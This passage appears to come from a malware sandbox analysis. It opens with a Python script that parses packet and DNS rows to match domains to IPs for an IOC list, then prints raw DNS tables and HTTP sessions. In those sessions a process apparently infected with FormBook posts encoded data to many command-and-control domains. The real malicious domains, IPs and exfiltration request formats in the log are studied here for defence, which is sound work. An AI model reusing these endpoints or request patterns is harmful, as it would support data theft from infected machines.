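    "Nov 26, 2024 09:29:53.572535038 CET4974480192.168.2.8104.21.36.239",
    "Nov 26, 2024 09:29:55.329508066 CET8049745104.21.36.239192.168.2.8",
    "Nov 26, 2024 09:30:01.509212017 CET5697253192.168.2.81.1.1.1",
    "Nov 26, 2024 09:30:03.721390009 CET53569721.1.1.1192.168.2.8",
    "Nov 26, 2024 09:30:03.724653959 CET4974680192.168.2.8208.91.197.27",
    "Nov 26, 2024 09:30:19.703794956 CET4975080192.168.2.8199.59.243.227",
    "Nov 26, 2024 09:30:34.801312923 CET4975480192.168.2.813.248.169.48",
    "Nov 26, 2024 09:30:49.757535934 CET4975880192.168.2.8185.26.237.170",
]
SAMPLE_QUERIES = [  # DNS query rows copied from this report
    "Nov 26, 2024 09:29:46.239993095 CET192.168.2.81.1.1.10x9250Standard query (0)www.goldbracelet.topA (IP address)IN (0x0001)false",
    "Nov 26, 2024 09:30:01.509212017 CET192.168.2.81.1.1.10x8ae6Standard query (0)www.regislemberthe.onlineA (IP address)IN (0x0001)false",
    "Nov 26, 2024 09:30:03.520962954 CET192.168.2.81.1.1.10x8ae6Standard query (0)www.regislemberthe.onlineA (IP address)IN (0x0001)false",
    "Nov 26, 2024 09:30:18.442737103 CET192.168.2.81.1.1.10x5dccStandard query (0)www.honk.cityA (IP address)IN (0x0001)false",
    "Nov 26, 2024 09:30:33.990149021 CET192.168.2.81.1.1.10x4487Standard query (0)www.gupiao.betA (IP address)IN (0x0001)false",
    "Nov 26, 2024 09:30:49.366940975 CET192.168.2.81.1.1.10x382eStandard query (0)www.fengzheng.shopA (IP address)IN (0x0001)false",
]


def parse_ts(text):
    return datetime.strptime(text[:-3], "%b %d, %Y %H:%M:%S.%f")  # report: 9 fractional digits


def split_ips(text):
    """All ways to cut 'A.B.C.DE.F.G.H' into two IPv4s, one of which is the guest."""
    for k in range(7, len(text) - 6):
        a, b = text[:k], text[k:]
        if IPV4_RE.fullmatch(a) and IPV4_RE.fullmatch(b) and GUEST_IP in (a, b):
            yield a, b


def parse_packet(row):
    """'... CET4974480192.168.2.8104.21.36.239' -> fields; '4974480' could be 49744/80 or
    4974/480, so every cut is tried and only the one consistent with the assumptions survives."""
    ts, _, tail = row.partition(" CET")
    digits = len(tail) - len(tail.lstrip("0123456789"))
    found = []
    for i in range(2, digits + 1):
        ports, ips = tail[:i], tail[i:]
        for j in range(1, len(ports)):
            if ports[j] == "0":  # no port is written with a leading zero
                continue
            sp, dp = int(ports[:j]), int(ports[j:])
            for src, dst in split_ips(ips):
                guest_port, remote_port = (sp, dp) if src == GUEST_IP else (dp, sp)
                if guest_port in EPHEMERAL and remote_port in SERVICE_PORTS:
                    found.append(dict(ts=parse_ts(ts), sport=sp, dport=dp, src=src, dst=dst))
    if len(found) != 1:
        raise ValueError(f"ambiguous or unparsable row: {row!r} -> {found}")
    return found[0]


def parse_query(row):
    ts, _, tail = row.partition(" CET")
    m = QUERY_RE.fullmatch(tail)
    ips = list(split_ips(m["ips"])) if m else []
    if len(ips) != 1:
        raise ValueError(f"not a DNS query row: {row!r}")
    return dict(ts=parse_ts(ts), src=ips[0][0], dst=ips[0][1], id=m["id"], name=m["name"])


def sessions(packets):
    """One entry per conversation, keyed by the guest's port (start time, remote endpoint)."""
    out = {}
    for p in packets:
        guest_port, remote = ((p["sport"], (p["dst"], p["dport"])) if p["src"] == GUEST_IP
                              else (p["dport"], (p["src"], p["sport"])))
        s = out.setdefault(guest_port, dict(start=p["ts"], remote=remote, packets=0))
        s["start"], s["packets"] = min(s["start"], p["ts"]), s["packets"] + 1
    return out


def attribute_to_queries(queries, sessions_by_port):
    """name -> remote IPs of the non-DNS sessions that began after that name was queried
    and before the next query.  Heuristic: confirm against the report's DNS answer table."""
    by_time = sorted(queries, key=lambda q: q["ts"])
    result = {}
    for s in sessions_by_port.values():
        ip, port = s["remote"]
        prior = [q for q in by_time if q["ts"] <= s["start"]]
        if port != 53 and prior:
            result.setdefault(prior[-1]["name"], set()).add(ip)
    return result


def query_cadence(queries):
    """First-seen time per distinct name and the gaps between them: FormBook walks its
    domain list one entry at a time, which shows here as a new name about every 15 s."""
    first = {}
    for q in sorted(queries, key=lambda q: q["ts"]):
        first.setdefault(q["name"], q["ts"])
    times = sorted(first.values())
    return first, [(b - a).total_seconds() for a, b in zip(times, times[1:])]


if __name__ == "__main__":
    packets = [parse_packet(r) for r in SAMPLE_PACKETS]
    queries = [parse_query(r) for r in SAMPLE_QUERIES]
    for name, ips in attribute_to_queries(queries, sessions(packets)).items():
        print(f"{name:28} -> {', '.join(sorted(ips))}")
    print("seconds between new domains:", [round(g, 1) for g in query_cadence(queries)[1]])
```

parse_packet refuses a row rather than guessing when more than one cut satisfies the assumptions, which is the behaviour to keep when feeding a whole report through it; a rejected row is one to inspect by hand. The attribution is purely temporal (the session that opens right after a name was resolved is assumed to be to that name), so it is a triage aid for an IOC list, and the DNS answer rows should be used to verify each pairing before the address is acted on.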
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 26, 2024 09:27:34.934351921 CET | 1.1.1.1 | 192.168.2.8 | 0x1867 | No error (0) | www.dojodigitize.shop | dojodigitize.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 09:27:34.934351921 CET | 1.1.1.1 | 192.168.2.8 | 0x1867 | No error (0) | dojodigitize.shop |  | 15.197.142.173 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:27:34.934351921 CET | 1.1.1.1 | 192.168.2.8 | 0x1867 | No error (0) | dojodigitize.shop |  | 3.33.152.147 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:27:51.565223932 CET | 1.1.1.1 | 192.168.2.8 | 0xa356 | No error (0) | www.masterqq.pro |  | 172.67.213.249 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:27:51.565223932 CET | 1.1.1.1 | 192.168.2.8 | 0xa356 | No error (0) | www.masterqq.pro |  | 104.21.23.224 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:06.652930975 CET | 1.1.1.1 | 192.168.2.8 | 0x7441 | No error (0) | www.hasan.cloud |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:06.652930975 CET | 1.1.1.1 | 192.168.2.8 | 0x7441 | No error (0) | www.hasan.cloud |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:21.580218077 CET | 1.1.1.1 | 192.168.2.8 | 0xfa34 | No error (0) | www.0be.info | 0be.info |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 09:28:21.580218077 CET | 1.1.1.1 | 192.168.2.8 | 0xfa34 | No error (0) | 0be.info |  | 173.0.157.187 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:36.927489996 CET | 1.1.1.1 | 192.168.2.8 | 0x2a3f | No error (0) | www.tageting.shop |  | 13.227.8.45 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:36.927489996 CET | 1.1.1.1 | 192.168.2.8 | 0x2a3f | No error (0) | www.tageting.shop |  | 13.227.8.9 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:36.927489996 CET | 1.1.1.1 | 192.168.2.8 | 0x2a3f | No error (0) | www.tageting.shop |  | 13.227.8.13 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:36.927489996 CET | 1.1.1.1 | 192.168.2.8 | 0x2a3f | No error (0) | www.tageting.shop |  | 13.227.8.115 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:52.613905907 CET | 1.1.1.1 | 192.168.2.8 | 0x5562 | Server failure (2) | www.ulojenukw.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:01.066418886 CET | 1.1.1.1 | 192.168.2.8 | 0x3e73 | No error (0) | www.ssps.shop |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:01.066418886 CET | 1.1.1.1 | 192.168.2.8 | 0x3e73 | No error (0) | www.ssps.shop |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:16.275991917 CET | 1.1.1.1 | 192.168.2.8 | 0xe483 | No error (0) | www.qqc5.top | qqc5.top |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 09:29:16.275991917 CET | 1.1.1.1 | 192.168.2.8 | 0xe483 | No error (0) | qqc5.top |  | 38.47.233.4 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:31.806231976 CET | 1.1.1.1 | 192.168.2.8 | 0x3023 | No error (0) | www.learnnow.info |  | 199.192.23.123 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:46.893877983 CET | 1.1.1.1 | 192.168.2.8 | 0x9250 | No error (0) | www.goldbracelet.top |  | 104.21.36.239 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:46.893877983 CET | 1.1.1.1 | 192.168.2.8 | 0x9250 | No error (0) | www.goldbracelet.top |  | 172.67.201.49 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:03.721390009 CET | 1.1.1.1 | 192.168.2.8 | 0x8ae6 | No error (0) | www.regislemberthe.online |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:03.721419096 CET | 1.1.1.1 | 192.168.2.8 | 0x8ae6 | No error (0) | www.regislemberthe.online |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:03.721487045 CET | 1.1.1.1 | 192.168.2.8 | 0x8ae6 | No error (0) | www.regislemberthe.online |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:19.700972080 CET | 1.1.1.1 | 192.168.2.8 | 0x5dcc | No error (0) | www.honk.city |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:19.701006889 CET | 1.1.1.1 | 192.168.2.8 | 0x5dcc | No error (0) | www.honk.city |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:34.797194004 CET | 1.1.1.1 | 192.168.2.8 | 0x4487 | No error (0) | www.gupiao.bet |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:34.797194004 CET | 1.1.1.1 | 192.168.2.8 | 0x4487 | No error (0) | www.gupiao.bet |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:49.754765987 CET | 1.1.1.1 | 192.168.2.8 | 0x382e | No error (0) | www.fengzheng.shop |  | 185.26.237.170 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49712 | 15.197.142.173 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:27:35.074786901 CET | 457 | OUT | GET /zxe0/?ynlT=El+NSyicP5BK/60EXWXaz7evSHJwK2e1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkBnZYNNwJ4YcRegv3/W3TWhCxoQqPNBROUFaIQ8+8cz4+g==&BZcp=FxLxsNCx3xt HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.dojodigitize.shop
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Nov 26, 2024 09:27:36.156138897 CET | 133 | IN | HTTP/1.1 404 Not Found
Server: awselb/2.0
Date: Tue, 26 Nov 2024 08:27:35 GMT
Content-Length: 0
Connection: close
WAFRule: 5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49713 | 172.67.213.249 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:27:51.709861040 CET | 707 | OUT | POST /vfw3/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.masterqq.pro
Cache-Control: no-cache
Content-Length: 205
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.masterqq.pro
Referer: http://www.masterqq.pro/vfw3/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=moIYvYq7EEvVURa8F3ZfZJKLTVI07rAiWNU3QSCaovL4jSGNx4aRf8H+dDunaT/dgbV4ap4ug/1Sl/N+QtyXStdz2n8tz21CZ+fwkPQ+tHQcGuDBAk9VJ9FOJf9bjLkJAOAzeHs5FFh9WBvBxU56sVwvMJOe0QKwxHdfBPXuODemNKtx0Lz7n5UnNnQcPATZkCjbDf0=
Nov 26, 2024 09:27:53.014630079 CET | 1026 | IN | HTTP/1.1 404 Not Found
Date: Tue, 26 Nov 2024 08:27:52 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCsFWfjLv620tjP4iq5iNp3c0bVeyRYZ1WG4e8g40Wuqx4cGzLe6T5Yr%2FeE3nMuv9GYUMaEPMkz4dAsfDOY5cyjmhbnnS4ekaI3eDYby4okFz6Wz6kXimls1F6WMGdWtuOqb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e88807658804400-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=707&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Ascii: fd6LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49714 | 172.67.213.249 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:27:54.465801001 CET | 727 | OUT | POST /vfw3/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.masterqq.pro
Cache-Control: no-cache
Content-Length: 225
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.masterqq.pro
Referer: http://www.masterqq.pro/vfw3/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=moIYvYq7EEvVSxq8EUxfRJKMKlI0xLAmWNY3QTGKoaT4ky2N+cORe8H+XjuiQz/GgbZwat4ug/hSl9V+QauYT9dxwn8v321CZ+fwkPEAtHIcHezBAGVUPNFNOf9bnLkFAOAdeGxkFGV9WAfByF55iVwtP5P7zQPG8mE9A/7iFRLcFccbup79k58MNk4qK3Ox+hzrdIjaSGQbuzgRzmGw3XoJws9Q
Nov 26, 2024 09:27:55.660151958 CET | 1024 | IN | HTTP/1.1 404 Not Found
Date: Tue, 26 Nov 2024 08:27:55 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COCxnX7ChKNOHP0FlugX7V0dAfhywGscetcl639ZtlEfw%2Fh5cHyhR4B%2BQMQJHhc6Ro%2B2QUC5vS9EsNQeCMlhSyLpc03v%2FKmGYuCNqYXlzFncb78HC2L7wYxGUMgju66RpI%2BP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e888086d8b4c342-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1529&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Ascii: e0LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49715 | 172.67.213.249 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:27:57.140439034 CET | 1744 | OUT | POST /vfw3/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.masterqq.pro
Cache-Control: no-cache
Content-Length: 1241
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.masterqq.pro
Referer: http://www.masterqq.pro/vfw3/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Data Ascii: ynlT=[TRUNCATED]
Nov 26, 2024 09:27:58.458396912 CET | 1028 | IN | HTTP/1.1 404 Not Found
Date: Tue, 26 Nov 2024 08:27:58 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5PoCDpbAx09MgJD%2BL2c7SJK0NBesSqUVSgXPmheNdbhqluvlzo5haagfX6kZFBfwwC8P3%2FGcNlpyojxWIk4wL0bCJ83YQ1e%2FI44V6jMJE3H8y8DfFPM%2BZXqYxHdvJKkkfBy"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8880985eee4249-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2209&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1744&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Ascii: d5LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8b*Y60


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49717 | 172.67.213.249 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:27:59.789674997 CET | 452 | OUT | GET /vfw3/?ynlT=rqg4sojPN1HzbyOgPnJNE4SyCm0Y3+McauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXfpXxUIp7SdBR5fyivcNmDQrGMikN20eFfd6B8gSgv5TSw==&BZcp=FxLxsNCx3xt HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.masterqq.pro
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Nov 26, 2024 09:28:01.112854004 CET | 1039 | IN | HTTP/1.1 404 Not Found
Date: Tue, 26 Nov 2024 08:28:00 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOBr9xxZ3xCfGlU%2BXwNn6vNmEkGHbIk3Qdtung1g%2BuzAIT74AdTg%2FgJp14rCnGFI9tljKUS2vopOo5tEV0hlz9IFgBSyovgxNmS7AJbSZR1ye1f8MrT1FoLmpR2JJreTh%2F%2F4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8880a8ff2542da-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=452&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: 106<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49718 | 13.248.169.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:28:06.803306103 CET | 704 | OUT | POST /ve8l/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.hasan.cloud
Cache-Control: no-cache
Content-Length: 205
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.hasan.cloud
Referer: http://www.hasan.cloud/ve8l/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=7ArYO37KdNV/tzTZMy3Yd0Zb2dZ067H8VDbvV3SGZ8NTkxI+AJwcDjG+buD8QMOjICvJDV3VFgubMLKcrvgtt3jhP5V3g9qNrhJYXQrOv41oUazAO+M41JRKs9ozDQLwvFXq3MTv/VriSAzqXxnisMEXzMp86iacvtB1qyXmwdD71+avvtWX4DIyD0qLQs/+pKg4A68=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                6 | 192.168.2.8 | 49719 | 13.248.169.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:09.477768898 CET | 724 | OUT | POST /ve8l/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.hasan.cloud
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.hasan.cloud
                                                                                Referer: http://www.hasan.cloud/ve8l/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Ascii: ynlT=7ArYO37KdNV/sQLZAz3YcUZU59Z0jrHCVDnvV2msZupTkR4+BMccAjG+TOD5dsOoICjBDXTVFjSbMJicqYUuuHjjAZV19tqNrhJYXQOpv4doUvjAOc03rZRJ8NozOwL0vFXU3JyK/XjiSFXqUjP9mMER3MoVqXzS2txqhh3687bv0IrF1PeR7DgZD3C9VbiWzpwIetpflrLFMqqb+6bTT61o0TuA


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                7 | 192.168.2.8 | 49720 | 13.248.169.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:12.138510942 CET | 1741 | OUT | POST /ve8l/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.hasan.cloud
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.hasan.cloud
                                                                                Referer: http://www.hasan.cloud/ve8l/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 73 51 4c 5a 41 7a 33 59 63 55 5a 55 35 39 5a 30 6a 72 48 43 56 44 6e 76 56 32 6d 73 5a 75 68 54 6b 43 77 2b 42 76 6b 63 42 6a 47 2b 51 4f 44 34 64 73 4f 31 49 43 37 2f 44 58 65 6f 46 6d 65 62 4f 6f 43 63 74 70 55 75 31 33 6a 6a 59 70 56 6f 67 39 71 55 72 68 35 63 58 51 2b 70 76 34 64 6f 55 75 54 41 5a 65 4d 33 70 5a 52 4b 73 39 6f 2f 44 51 4b 72 76 46 65 76 33 4a 2b 30 34 6e 44 69 54 6a 33 71 53 51 6e 39 71 4d 45 54 36 73 6f 4e 71 58 33 5a 32 74 73 54 68 67 54 41 38 38 2f 76 31 38 6d 34 79 74 43 4b 6f 51 49 76 50 31 57 61 51 5a 65 6d 78 6f 77 37 44 39 56 51 68 36 36 6b 50 5a 69 48 2b 49 58 66 42 75 55 35 79 6d 36 4d 72 32 50 75 50 77 5a 59 57 6d 6d 54 31 39 79 2b 70 7a 30 4d 32 53 6c 6a 7a 33 69 38 41 42 66 4c 68 45 69 78 35 4e 30 75 4f 36 49 52 4d 49 47 6f 31 37 35 54 2f 4b 66 6b 4f 32 4b 56 48 4b 57 71 58 53 2b 44 57 51 45 56 59 2b 69 6c 45 35 54 4c 31 62 4c 48 72 6e 38 76 71 2f 6a 73 46 33 49 50 61 5a 44 34 42 55 76 2f 47 72 62 47 2f 5a 37 2b 7a [TRUNCATED]
                                                                                Data Ascii: ynlT=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 [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                8 | 192.168.2.8 | 49721 | 13.248.169.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:28:14.790781021 CET | 451 | OUT | GET /ve8l/?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q== HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.hasan.cloud
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:28:15.929868937 CET | 409 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 26 Nov 2024 08:28:15 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 269
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q=="}</script></head></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
